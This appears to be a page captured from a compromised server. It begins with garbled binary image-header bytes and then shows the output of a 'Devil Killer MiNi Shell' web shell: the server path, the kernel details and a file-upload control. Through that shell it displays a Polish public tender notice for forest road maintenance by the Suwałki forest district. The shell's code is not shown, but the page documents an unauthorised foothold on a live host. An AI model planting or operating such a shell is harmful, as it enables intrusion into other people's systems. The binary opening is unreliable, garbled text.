JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230804/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230804/0034120501-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Bieżące utrzymanie, konserwacja i remont dróg leśnych na terenie Nadleśnictwa Suwałki w 2023 roku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Skarb Państwa Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Suwałki</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Nadleśnictwo Suwałki</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 790504898</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wojska Polskiego 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Suwałki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">16-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL843 - Suwalski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">875664295</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">suwalki@bialystok.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.suwalki.bialystok.lasy.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Gospodarka leśna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Bieżące utrzymanie, konserwacja i remont dróg leśnych na terenie Nadleśnictwa Suwałki w 2023 roku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b0c5a250-31f3-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00341205</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-08-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00135394/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Utrzymanie i konserwacja dróg leśnych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/lasy_suwalki <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/lasy_suwalki</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne<br/>wysyłania i odbierania dokumentów elektronicznych, cyfrowego odwzorowania dokumentów w postaci papierowej (elektronicznych<br/>kopii dokumentów stworzonych w postaci papierowej) oraz informacji przekazywanych przy ich użyciu opisane zostały w<br/>Regulaminie korzystania z platformy https://platformazakupowa.pl i są dostępne przy każdym postępowaniu na platformie<br/>https://platformazakupowa.pl/strona/1-regulamin oraz w instrukcji dla wykonawców dostępnej na platformie<br/>https://platformazakupowa.pl/strona/45-instrukcje.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://platformazakupowa.pl/pn/lasy_suwalki</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.Zam.przetwarza dane os.zebrane w niniejszym postęp.o<br/>udzielenie zam.publ. w sposób gwarant.zabez. przed ich bezprawnym<br/>rozpowszechnianiem2.Zam.udostępnia dane os.,o których mowa w art.10RODO w celu umożliwienia korzystania ze śr.ochrony<br/>prawnej,o których mowa w dzialeVI PZP do upływu terminu do ichWniesienia3.Do przetw.danych os.,o których mowa w<br/>art.10RODOmogą być dopuszczone wyłącznie os. posiadające upoważnienie.Os.dopuszczone do przetw.takich danych są<br/>obowiązane do zachowania ich w poufności4.Dane os.przetw.będą na podstawie art. 6ust.1lit.cRODO w celu związanym z<br/>prowadz.niniejszego postęp.o udzielenie zam.pub.oraz jego rozstrzygnięciem, jak również, jeżeli nie ziszczą się przesłanki określ.w<br/>art.255-256PZP–w celu zawarcia umowy w sprawie zam.pub.oraz jej realizacji, a także udokumentowania postęp. o udzielenie zam.<br/>i jego archiwizacji5.Odb.danych os.będą os.lub podm.,którym dokumentacja postęp.zostanie udostępniona w oparciu o<br/>przepisyPZP6.Dane os.poz.w związku z prowadzeniem niniejszego postęp. o udzielenie zamów.pub. będą przechowywane, zgodnie<br/>z art. 78 ust.1PZP, przez okres 4 lat od dnia zakończenia postęp. o udzielenie zam. pub., a jeżeli czas trw.umowy przekracza 4 lata,<br/>okres przechow.obejmuje cały czas trwania umowy ws.zam.pub.7.Niezależnie od postanowień pktf)powyżej,w przypadku zawarcia<br/>umowy w sprawie zam.pub.,dane os.będą przetwarzane do upływu okresu przedawnienia roszczeń wynik.z umowy ws.zam.pub.<br/>8.Dane os.poz.w związku z prowadzeniem niniejszego postęp.o udzielenie zam.mogą zostać przekazane podm.świadczącym<br/>usł.doradcze, w tym usł.prawne, i konsultingowe9.Stosownie do art.22RODO, decyzje dot.danych os.nie będą podejmowane w<br/>sposób zautomatyzowany10.Os., której dotyczą poz.w zw.z prowadzeniem niniejszego postęp.dane os., ma prawo:a)dostępu do<br/>swoich danych os.–zgodnie z art.15 RODO, przy czym w sytuacji, gdy wykonanie obow. o których mowa w art.15ust.1-3 RODO<br/>wymagałoby niewspółmiernie dużego wysiłku Zam.może żądać wskazania dodatkowych inf.mających na celu sprecyz.żądania,w<br/>szczególności podania nazwy lub daty bieżącego bądź zakończonego postęp.o udzielenie zam.pub.b)do sprost.swoich danych os.–<br/>zgodnie z art.16RODO,przy czym skorzystanie z uprawnienia do sprost.lub uzupełnienia danych os.,o którym mowa w art.16RODO<br/>nie może skutkować zmianą wyniku postęp. o udzielenie zam.pub.ani zmianą postanowień umowy w zakresie niezgodnym zPZP<br/>oraz nie może naruszać integralności protok.oraz jego zał.c)do żądania od Zam.–jako admin.ograniczenia przetw.danych os.z<br/>zastrzeż.przypadków,o których mowa w art.18ust.2RODO,przy czym prawo do ograniczenia przetw. nie ma zastosowania w<br/>odniesieniu do przechowywania,w celu zapewnienia korzystania ze śr.ochr.prawnej lub w celu ochr.praw innej os.fiz.lub prawnej, lub<br/>z uwagi na ważne względy interesu publicznego UE lub państwa członk.; prawo to nie ogranicza przetw.danych os. do czasu<br/>zakończenia postęp. o udzielenie zam.pub.d)wniesienia skargi do PrezesaUODO w przypadku uznania,iż przetw.jej danych os.<br/>narusza przepisy o ochr.danych os.,w tym przepisyRODO11.Obowiązek podania danych os.jest wymogiem ustawowym określonym<br/>w przepisachPZP,zw.z udziałem w postęp. o udzielenie zam.pub.; konsekwencje niepodania określonych danych<br/>określaPZP12.Osobie,której dane os.zostały pozyskane przez Zam.w zw.z prowadzeniem niniejszego postęp. o udzielenie zam.<br/>pub.nie przysługuje:a)prawo do usunięcia danych os., o czym przesadza art.17ust.3lit.b,d lub e RODOb)prawo do przenoszenia<br/>danych os., o którym mowa w art.20RODO, określone w art.21RODO prawo sprzeciwu wobec przetw.danych os., a to z uwagi na<br/>fakt, że podst.prawną przetw.danych os.jest art.6ust.1lit.cRODO13.Dane os. mogą być przekazywane do organów pub.i urzędów<br/>państ.lub innych podm.upoważnionych na podst.przepisów prawa lub wykonujących zad. realiz.w interesie pub.lub w ramach sprawowania władzy pub., w szczególności do podm.prowadzących działal.kontrolną wobec Zam.Dane os.są przekazyw.do<br/>podm.przetw.dane w imieniu admin.danych os.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SA.270.28.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są roboty budowlane polegające na utrzymaniu, konserwacji i remoncie odcinków dróg leśnych, które uległy deformacji, poprzez profilowanie oraz uzupełnianie nawierzchni (kolein i wybojów) pospółką drogową „lekko zaglinioną” wraz z utwardzeniem oraz odsłonięciem dróg. Profilowanie polegać będzie na wyrównaniu nawierzchni oraz nadaniu odpowiednich spadków poprzecznych za pomocą równiarki samojezdnej. Naprawa nawierzchni dróg polegać będzie na dowiezieniu oraz rozplantowaniu pospółki drogowej po uprzednim usunięciu ewentualnych zastoisk wody czy błota, wraz z utwardzeniem i wyprofilowaniem naprawianego odcinka drogi. <br/>Całkowity zakres prac:<br/>a)	uzupełnienie ubytków w nawierzchni dróg - prace polegają na lekkim spulchnieniu struktury wyboi lub kolein, uzupełnieniu ubytków mieszanką żwirową „lekko zaglinioną” oraz jej zagęszczeniu. Przed przystąpieniem do robót należy wykonać wykoszenie poboczy o szerokości min. 2 m poza koronę drogi, z obu stron drogi, odprowadzenie stagnującej wody, ewentualnie usunięcie warstwy darniny i humusu oraz wybranie zalegającego błota. Uzupełnienia należy wykonać z nadmiarem na wysokości 5 cm. Zamówienie obejmuje zakup oraz dostawę przez Wykonawcę kruszywa naturalnego frakcji 0/63 mm. Krzywa uziarnienia mieszanki powinna mieścić się w granicach krzywych obszaru podanych w STWiOR. Kruszywo naturalne użyte do mieszanki żwirowej powinno spełniać wymagania normy PN-EN 13242 „Kruszywa do niezwiązanych i hydraulicznie związanych materiałów stosowanych w obiektach budowlanych i budownictwie drogowym”.<br/>b)	praca sprzętu (m.in. ładowarko-koparki, koparki, samochodu skrzyniowego, walca) - przy profilowaniu zawyżonych poboczy, usunięciu warstwy darniny i humusu, usunięciu zastoisk wody, usunięciu karczy w skrajni drogi i odmuleniu rowów rowów otwartych, uzupełnieniu ubytków i zagęszczeniu dowiezionego kruszywa drogowego, wywiezienie nadmiarowej materii organicznej, konserwacja i naprawa wszystkich elementów technicznych.<br/>c)	odsłanianiu dróg czynność polegająca na wycięciu podszytów i podrostów (np. przy użyciu pilarki spalinowej, wykaszarki, kosiarki bijakowej), wchodzących w zasięg do dwóch metrów poza koronę drogi, z obydwu jej stron (łączna szerokość 4m - po 2m z każdej stronie drogi leśnej). Korona drogi powinna być odsłonięta, aby zapewnić swobodny przejazd pojazdów wysokotonażowych np. wywożących drewno, wozów gaśniczych (załącznik nr 1 do STWiOR).<br/><br/>Część I - Obręb Suwałki - pn. „Bieżące utrzymanie, konserwacja i remont dróg leśnych na terenie Nadleśnictwa Suwałki w 2023“.<br/><br/>Lokalizacja prac: teren Nadleśnictwa Suwałki. <br/>Część I zamówienia obejmuje leśnictwa: Papiernia, Płociczno, Pijawne, Walne.<br/><br/>Całkowity zakres prac do wykonania w tej części zamówienia obejmuje wykonanie nastepujących prac ww. leśnictwach:<br/>a)	bieżące utrzymanie i konserwacja dróg leśnych poprze miejscowe uzupełnienie ubytków w nawierzchni dróg o łącznej długości ok. 1 km, średniej szerokości ok. 3,5 m, średniej grubości warstwy mieszanki żwirowej do uzupełnienia ok. 0,1-0,2 m w zależności od lokalizacji i stanu nawierzchni drogi leśnej (zapotrzebowanie ok. 375 m3), wraz z odsłonięciem każdego odcinka drogi przeznaczonego do utrzymania,<br/>b)	remont dróg pożarowych o nr 1 (długość ok. 2 km) oraz cześć drogi nr 4 (długość ok. 3 km) poprzez przywrócenie parametrów przeciwpożarowych: 5 m szerokości oraz koronie drogi o szerokości 6 m , utrzymanie drożności urządzeń odwadniających (m.in. rowów), średniej grubości warstwy mieszanki żwirowej do uzupełnienia ok. 0,1-0,2 m w zależności od lokalizacji i stanu nawierzchni drogi leśnej (zapotrzebowanie ok. 3 660 m3) wraz z odsłonięciem każdego odcinka drogi przeznaczonego do remontu. <br/>c)	pracę sprzętu drogowego w celu wykonania zamówienia, o łącznej ilości ok. 98 godzin. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45233141-9 - Roboty w zakresie konserwacji dróg</p> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">14210000-6 - Żwir, piasek, kamień kruszony i kruszywa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> W stosunku do każdej Części Zamawiający jest uprawniony zlecić Wykonawcy dodatkowy zakres rzeczowy w stosunku do<br/>łącznej ilości wszystkich czynności wycenionych w każdej z pozycji kosztorysu ofertowego stanowiącego część Oferty<br/>(„Opcja”). Przedmiotem Opcji będą takie same (analogiczne prace), jak opisane w SWZ i wycenione przez Wykonawcę w<br/>którejkolwiek z pozycji kosztorysu ofertowego stanowiącego część Oferty. W ramach Opcji, wedle wyboru Zamawiającego,<br/>mogą zostać zlecone wszystkie, niektóre lub tylko jedna z prac wskazanych w SWZ i wycenionych przez Wykonawcę w<br/>kosztorysie ofertowym stanowiącym część Oferty.<br/>Prace będące przedmiotem Opcji mogą zostać zlecone w ilości, która nie będzie przekraczała 20 % Wartości Przedmiotu<br/>Umowy określonej zgodnie z § 8 ust. 1 stanowiącego załącznik nr 9 do SWZ. Podstawą określenia wartości prac zleconych<br/>w ramach Opcji (w celu określenia jej zakresu) będą ceny jednostkowe poszczególnych prac zawarte w kosztorysie<br/>ofertowym stanowiącym część Oferty.<br/>Zamawiający nie jest zobowiązany do zlecenia prac objętych przedmiotem Opcji, a Wykonawcy nie służy roszczenie o ich<br/>zlecenie.<br/>Zamawiający przewiduje możliwość skorzystania z Opcji w przypadku: wystąpienia potrzeby zwiększenia zakresu<br/>rzeczowego usług stanowiących przedmiot zamówienia z uwagi na faktyczną sytuację przyrodniczo-pogodową, która może<br/>zaistnieć w trakcie realizacji przedmiotu zamówienia, a także nieprzewidzianą w tej chwili sytuację gospodarczo-ekonomiczną. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2,5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W związku z tym, iż dokonano szczegółowego opisu przedmiotu zamówienia i precyzyjnie określono wymagania jakościowe odnoszące się do głównych elementów składających się na przedmiot zamówienia, termin wykonania zamówienia, warunki gwarancji, parametry techniczne i jakościowe, przy wyborze oferty Zamawiający będzie się kierował następującym kryterium oceny ofert, przypisując mu odpowiednią wagę procentową: 100%-cena.<br/>Ocenie w ramach kryterium cena podlegać będzie łączna cena brutto podana przez Wykonawcę w formularzu ofertowym na daną część.<br/>Cena oferty musi obejmować wszystkie koszty związane z realizacją przedmiotu zamówienia, zgodnie z załączoną specyfikacją techniczną wykonania i odbioru robót, uwzględniająca cały zakres przedmiotu zamówienia (robocizna, materiały wraz z ich transportem, pracy sprzętu i środków transportu), wymaganiami wymienionymi w specyfikacji warunków zamówienia i w projektowanych postanowieniach umowy w sprawie zamówienia publicznego, zasadami najlepszej wiedzy technicznej i sztuki<br/>budowlanej, ewentualne ryzyko wynikające z okoliczności, które można było przewidzieć w terminie opracowywania oferty do czasu jej złożenia, a także wszystkie potencjalne ryzyka ekonomiczne, jakie mogą wystąpić przy realizacji przedmiotu umowy, wynikające z okoliczności, których nie można było przewidzieć w chwili zawierania umowy.<br/>Cena - Waga 100%<br/>C= (C minimalna/C badana)x 100 punktów, przy czym 1% odpowiada 1 pkt<br/>Za najkorzystniejszą uważać się będzie ofertę, która uzyska najwyższą ilość punktów.<br/>Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia danej części.<br/>Wszystkie obliczenia będą dokonywane z dokładnością do dwóch miejsc po przecinku. Zgodnie z matematycznymi zasadami zaokrąglania (końcówki poniżej 0,005 pkt pomija się a końcówki 0,005 i wyższe zaokrągla się do 0,01 pkt ).<br/>Ocena w zakresie kryteriów zostanie dokonana na podstawie wypełnionego „Formularza oferty” i złożonej w nim deklaracji Wykonawcy.<br/>Ocena ofert zostanie dokonana oddzielnie dla każdej części zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są roboty budowlane polegające na utrzymaniu, konserwacji i remoncie odcinków dróg leśnych, które uległy deformacji, poprzez profilowanie oraz uzupełnianie nawierzchni (kolein i wybojów) pospółką drogową „lekko zaglinioną” wraz z utwardzeniem oraz odsłonięciem dróg. Profilowanie polegać będzie na wyrównaniu nawierzchni oraz nadaniu odpowiednich spadków poprzecznych za pomocą równiarki samojezdnej. Naprawa nawierzchni dróg polegać będzie na dowiezieniu oraz rozplantowaniu pospółki drogowej po uprzednim usunięciu ewentualnych zastoisk wody czy błota, wraz z utwardzeniem i wyprofilowaniem naprawianego odcinka drogi. <br/>Całkowity zakres prac:<br/>a)	uzupełnienie ubytków w nawierzchni dróg - prace polegają na lekkim spulchnieniu struktury wyboi lub kolein, uzupełnieniu ubytków mieszanką żwirową „lekko zaglinioną” oraz jej zagęszczeniu. Przed przystąpieniem do robót należy wykonać wykoszenie poboczy o szerokości min. 2 m poza koronę drogi, z obu stron drogi, odprowadzenie stagnującej wody, ewentualnie usunięcie warstwy darniny i humusu oraz wybranie zalegającego błota. Uzupełnienia należy wykonać z nadmiarem na wysokości 5 cm. Zamówienie obejmuje zakup oraz dostawę przez Wykonawcę kruszywa naturalnego frakcji 0/63 mm. Krzywa uziarnienia mieszanki powinna mieścić się w granicach krzywych obszaru podanych w STWiOR. Kruszywo naturalne użyte do mieszanki żwirowej powinno spełniać wymagania normy PN-EN 13242 „Kruszywa do niezwiązanych i hydraulicznie związanych materiałów stosowanych w obiektach budowlanych i budownictwie drogowym”.<br/>b)	praca sprzętu (m.in. ładowarko-koparki, koparki, samochodu skrzyniowego, walca) - przy profilowaniu zawyżonych poboczy, usunięciu warstwy darniny i humusu, usunięciu zastoisk wody, usunięciu karczy w skrajni drogi i odmuleniu rowów rowów otwartych, uzupełnieniu ubytków i zagęszczeniu dowiezionego kruszywa drogowego, wywiezienie nadmiarowej materii organicznej, konserwacja i naprawa wszystkich elementów technicznych.<br/>c)	odsłanianiu dróg czynność polegająca na wycięciu podszytów i podrostów (np. przy użyciu pilarki spalinowej, wykaszarki, kosiarki bijakowej), wchodzących w zasięg do dwóch metrów poza koronę drogi, z obydwu jej stron (łączna szerokość 4m - po 2m z każdej stronie drogi leśnej). Korona drogi powinna być odsłonięta, aby zapewnić swobodny przejazd pojazdów wysokotonażowych np. wywożących drewno, wozów gaśniczych (załącznik nr 1 do STWiOR).<br/><br/>Część II – Obręb Puńsk – pn. „Bieżące utrzymanie i konserwacja dróg 